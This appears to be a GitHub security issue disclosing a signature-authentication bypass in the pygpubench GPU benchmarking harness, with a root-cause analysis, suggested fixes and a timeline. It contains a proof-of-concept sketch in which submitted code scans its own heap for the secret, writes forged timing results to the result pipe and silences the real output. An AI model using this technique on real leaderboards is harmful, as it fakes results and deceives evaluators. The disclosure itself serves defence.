pygpubench Signature Authentication Bypass

## Summary

pygpubench authenticates benchmark results using a random signature that is sent from the parent process to the child process over a pipe. The child's C++ code stores this signature in a `std::string` on the heap. Because the child process can read its own `/proc/self/maps` and scan heap memory with `ctypes`, it can extract the signature, write forged results to the inherited pipe fd, and redirect the pipe to `/dev/null` before the C++ benchmark loop runs. The parent accepts the forged results because they contain the correct signature.

This is a complete benchmark bypass: the attacker controls all reported times, error counts, and completion status without running a real kernel.

## Severity

**Critical** — full benchmark integrity failure for any problem using `do_bench_isolated`.

## Affected Component

`pygpubench.do_bench_isolated` — specifically the signature-based result authentication in `python/pygpubench/__init__.py:230-259` and the signature storage in `csrc/manager.cpp:127`.

## Root Cause

The signature is a shared secret between the parent and child processes. It is transmitted to the child over a pipe (`sig_r`/`sig_w`), read by the C++ code in `read_benchmark_parameters`, and stored in `BenchmarkManager::mSignature` (a `std::string` member). The untrusted kernel is imported **after** the signature is already in child-process memory. Since the child process runs attacker-controlled Python code, the attacker can read arbitrary process memory using `ctypes` and recover the signature.

### Why existing defenses don't prevent this

| Defense | Why it doesn't help |
|---|---|
| `PR_SET_DUMPABLE=0` | Prevents **other** processes from reading `/proc/PID/mem`. Does not affect the process reading its own `/proc/self/maps` (inode mode `S_IRUGO = 0444`, world-readable). Does not affect `ctypes` memory access (direct pointer dereference, no filesystem I/O). |
| Landlock | Allows read-only access to `/` (covers procfs). Allows read-write access to `/dev` (needed for `/dev/null` redirect). Does not restrict `ctypes` or `os.write` to inherited pipe fds. |
| `PR_SET_NO_NEW_PRIVS` | Prevents privilege escalation. Does not restrict memory reads within the process. |
| C++ benchmark loop | Runs **after** the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts. |
| Error counter randomization | Irrelevant — the exploit forges the `error-count` field directly in the pipe output, bypassing the GPU-side counter entirely. |

### The attack chain

```
Parent                                          Child (subprocess)
──────                                          ──────────────────
secrets.token_hex(16) → signature
write signature to sig_w pipe ──────────────►   C++ reads sig_r → mSignature (heap)
                                                C++ calls setup_benchmark()
                                                C++ installs landlock
                                                C++ calls kernel_from_qualname()
                                                  └─► import submission  ◄──── ATTACKER CODE RUNS HERE
                                                        ├─ gc.get_objects() → count tuples → repeats
                                                        ├─ open("/proc/self/maps") → heap regions
                                                        ├─ ctypes.string_at(heap) → signature
                                                        ├─ os.fstat(0..255) → pipe fd
                                                        ├─ os.write(pipe_fd, forged_results + signature)
                                                        ├─ os.dup2(/dev/null, pipe_fd)
                                                        └─ define correct kernel()
                                                C++ benchmark loop runs (writes go to /dev/null)
                                                process exits with code 0
reads pipe → forged data       ◄────────────
validates signature → PASS
accepts forged times (0.42 µs)
```

## Proof of Concept

**File:**  [submission_memscan_signature.py](https://github.com/user-attachments/files/25820871/submission_memscan_signature.py)

The PoC runs entirely at import time (before the C++ benchmark loop executes):

```python
# Step 1: Count (tensor, rtol, atol) tuples in gc → infer repeats
for obj in gc.get_objects():
    if isinstance(obj, tuple) and len(obj) == 3:
        a, b, c = obj
        if isinstance(a, torch.Tensor) and a.is_cuda and isinstance(b, float) ...
            expected_count += 1
repeats = expected_count - 1  # subtract warmup slot

# Step 2: Read /proc/self/maps, scan heap for 32-char hex string
with open('/proc/self/maps') as f:
    for line in f:
        start, end = parse_address_range(line)
        data = ctypes.string_at(start, end - start)
        for match in re.finditer(rb'(?<![0-9a-f])([0-9a-f]{32})\x00', data):
            candidates.append(match.group(1).decode())

# Step 3: Find pipe fd
for fd in range(256):
    if stat.S_ISFIFO(os.fstat(fd).st_mode):
        pipe_fds.append(fd)

# Step 4: Write forged results with extracted signature
payload = "event-overhead\t0.002 us\n"
for i in range(repeats):
    payload += f"{i}\t0.42\n"       # 0.42 µs per iteration
payload += f"signature\t{signature}\n"
os.write(pipe_fd, payload.encode())

# Step 5: Redirect pipe to /dev/null (C++ output goes nowhere)
os.dup2(os.open('/dev/null', os.O_WRONLY), pipe_fd)

# Step 6: Correct kernel so process exits cleanly (exit code 0)
def kernel(output, inp):
    torch.sum(inp * weights, dim=-1, out=output)
```

### Running the PoC

```bash
cd pygpubench/exploits
python run_all.py submission_memscan_signature
```

Expected output: `CHEAT SUCCEEDED (bypassed detection)` — the benchmark reports 0.42 µs per iteration with no errors, despite the kernel not being the one that was timed.

### Prerequisites

- Linux (for `/proc/self/maps` and landlock)
- CUDA GPU (for torch tensor operations)
- pygpubench installed (`pip install pygpubench`)

## Additional Findings

### GC metadata leakage (HIGH)

At kernel import time, `gc.get_objects()` reveals all expected-output tuples `(tensor, rtol, atol)` created by the test generator. Even though the tensor data has been zeroed, the Python tuple objects are still alive because the C++ `std::vector<nb::tuple>` holds strong references. This reveals:

- **Exact `repeats` value** — needed to construct correctly-sized forged results
- **Output tensor shapes and dtypes** — useful for other exploit strategies
- **Tolerance values** — useful for crafting outputs that barely pass

The signature exploit depends on this to know how many iteration results to forge.

**Source:** `csrc/manager.cpp:143-166` — `setup_benchmark` stores tuples in vectors that persist through `do_bench_py`.

**Fix:** After copying expected data to C++ memory, release the Python tuple references (`expected.clear()`) and call `gc.collect()` before importing the kernel.

### Warmup detection (MEDIUM)

The warmup phase always uses `args.at(0)` (`csrc/manager.cpp:301-324`). The kernel can detect warmup by tracking `input.data_ptr()` (same pointer every warmup call, different pointer for benchmark calls) and add artificial delay to inflate `time_estimate`, reducing `actual_calls` to the minimum of 3.

**Fix:** Randomize which test case is used for warmup.

### NaN wildcard in checker (LOW, latent)

`csrc/check.cu:44-46` treats NaN in expected output as a wildcard:

```cuda
if (isnan(a))
    return;  // accepts ANY received value
```

Currently not exploitable because expected outputs are in non-torch `cudaMalloc` memory at unknown addresses. But if any future attack vector reveals those addresses, NaN injection would bypass correctness entirely.

**Fix:** Remove the NaN wildcard. Treat NaN in expected output as a test-generation bug and fail the benchmark.

### ctypes CUDA runtime access (LOW, latent)

The submission can call CUDA runtime functions via `ctypes.CDLL('libcudart.so')` — including `cudaMemcpy`, `cudaMemset`, and `cudaPointerGetAttributes`. Combined with heuristics about `cudaMalloc` allocation patterns, this could theoretically locate expected output copies or the error counter in GPU memory.

Currently impractical because: (a) the error counter has a random offset + random shift in a 2 MiB arena, and (b) expected output addresses are not predictable. But this is a latent risk.

**Fix:** Consider `seccomp` filters to restrict CUDA-related `ioctl` syscalls to only the specific ioctls needed for kernel launch and synchronization.

## Recommended Fixes

### For the signature bypass (critical)

**Option A: HMAC-based authentication (minimal change)**

1. At C++ init time (before any user code), read 32 bytes from `/dev/urandom` into a local C++ variable
2. Send these bytes to the parent over a one-way pipe (parent reads, child writes, pipe is closed)
3. After the benchmark loop, compute HMAC-SHA256 over the raw result bytes using the key
4. Append the HMAC tag to the pipe output
5. **Overwrite the key in memory** (`memset_explicit`) before importing the kernel
6. The parent recomputes the HMAC and rejects mismatches

Since the key is consumed and explicitly overwritten before the kernel is imported, memory scanning cannot recover it.

**Option B: Separate validator process (stronger)**

Run the benchmark in a three-process architecture:
- **Orchestrator** (trusted): generates test cases, owns the result pipe
- **Worker** (untrusted): runs the kernel, writes raw timing events to a pipe
- **Validator** (trusted, never imports submission): reads the same inputs, runs the reference kernel, compares outputs

The worker never sees expected outputs or authentication keys.

### For GC metadata leakage

```cpp
// In do_bench_py, after copying expected outputs:
expected.clear();      // release Python tuple references
trigger_gc();          // clean up
// THEN import the kernel
```

### For warmup detection

```cpp
// Instead of always using args.at(0):
std::uniform_int_distribution<int> warmup_dist(0, calls);
int warmup_idx = warmup_dist(rng);
// Use args.at(warmup_idx) for warmup
```

### For NaN wildcard

```cuda
// In check_approx_match_kernel:
if (isnan(a)) {
    ++res;  // NaN in expected = test bug, not wildcard
    return;
}
```

## What pygpubench Gets Right

Despite this finding, pygpubench is a **massive improvement** over the original evaluator:

| Attack class | Original evaluator | pygpubench |
|---|---|---|
| `__code__` patching | Trivially exploitable | **Fully blocked** (C++ implementation) |
| `torch.cuda.Event` patching | Trivially exploitable | **Fully blocked** (C CUDA API) |
| GC NaN injection on expected outputs | N/A (no protection) | **Blocked** (cudaMalloc copy + zeroing) |
| GC answer copy | N/A (no protection) | **Blocked** (expected data zeroed) |
| Stream-based timing manipulation | N/A (no protection) | **Blocked** (programmatic stream serialization + randomized block checking) |
| Filesystem tampering | N/A (no sandboxing) | **Blocked** (landlock) |
| Error counter manipulation | N/A (no counter) | **Effectively blocked** (random offset + shift) |
| Input caching | N/A (no protection) | **Blocked** (shadow args + canaries + L2 clear) |

The old Class 1 (`__code__` patching) and Class 2 (timing infrastructure patching) exploits that affected every leaderboard on gpumode.com/home are completely eliminated. The remaining signature bypass requires significantly more sophistication and is straightforward to fix.

## Disclosure Timeline

| Date | Event |
|---|---|
| 2026-03-07 | Original evaluator vulnerability disclosed to GPU MODE team |
| 2026-03-07 | GPU MODE responds, points to pygpubench as the replacement |
| 2026-03-07 | pygpubench security review conducted; signature bypass identified |
| 2026-03-07 | This report and PoC prepared |

## Files

| File | Description |
|---|---|
| [submission_memscan_signature.py](https://github.com/user-attachments/files/25820871/submission_memscan_signature.py)| PoC exploit: memory scan + pipe hijack |
| This document | Full security audit and disclosure |


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

pygpubench Signature Authentication Bypass #23

Summary

Severity

Affected Component

Root Cause

Why existing defenses don't prevent this

The attack chain

Proof of Concept

Running the PoC

Prerequisites

Additional Findings

GC metadata leakage (HIGH)

Warmup detection (MEDIUM)

NaN wildcard in checker (LOW, latent)

ctypes CUDA runtime access (LOW, latent)

Recommended Fixes

For the signature bypass (critical)

For GC metadata leakage

For warmup detection

For NaN wildcard

What pygpubench Gets Right

Disclosure Timeline

Files

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Defense	Why it doesn't help
`PR_SET_DUMPABLE=0`	Prevents other processes from reading `/proc/PID/mem`. Does not affect the process reading its own `/proc/self/maps` (inode mode `S_IRUGO = 0444`, world-readable). Does not affect `ctypes` memory access (direct pointer dereference, no filesystem I/O).
Landlock	Allows read-only access to `/` (covers procfs). Allows read-write access to `/dev` (needed for `/dev/null` redirect). Does not restrict `ctypes` or `os.write` to inherited pipe fds.
`PR_SET_NO_NEW_PRIVS`	Prevents privilege escalation. Does not restrict memory reads within the process.
C++ benchmark loop	Runs after the kernel is imported. The exploit injects forged results at import time, before the benchmark loop starts.
Error counter randomization	Irrelevant — the exploit forges the `error-count` field directly in the pipe output, bypassing the GPU-side counter entirely.

Attack class	Original evaluator	pygpubench
`__code__` patching	Trivially exploitable	Fully blocked (C++ implementation)
`torch.cuda.Event` patching	Trivially exploitable	Fully blocked (C CUDA API)
GC NaN injection on expected outputs	N/A (no protection)	Blocked (cudaMalloc copy + zeroing)
GC answer copy	N/A (no protection)	Blocked (expected data zeroed)
Stream-based timing manipulation	N/A (no protection)	Blocked (programmatic stream serialization + randomized block checking)
Filesystem tampering	N/A (no sandboxing)	Blocked (landlock)
Error counter manipulation	N/A (no counter)	Effectively blocked (random offset + shift)
Input caching	N/A (no protection)	Blocked (shadow args + canaries + L2 clear)

Date	Event
2026-03-07	Original evaluator vulnerability disclosed to GPU MODE team
2026-03-07	GPU MODE responds, points to pygpubench as the replacement
2026-03-07	pygpubench security review conducted; signature bypass identified
2026-03-07	This report and PoC prepared

File	Description
submission_memscan_signature.py	PoC exploit: memory scan + pipe hijack
This document	Full security audit and disclosure

pygpubench Signature Authentication Bypass #23

Description

Summary

Severity

Affected Component

Root Cause

Why existing defenses don't prevent this

The attack chain

Proof of Concept

Running the PoC

Prerequisites

Additional Findings

GC metadata leakage (HIGH)

Warmup detection (MEDIUM)

NaN wildcard in checker (LOW, latent)

ctypes CUDA runtime access (LOW, latent)

Recommended Fixes

For the signature bypass (critical)

For GC metadata leakage

For warmup detection

For NaN wildcard

What pygpubench Gets Right

Disclosure Timeline

Files

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions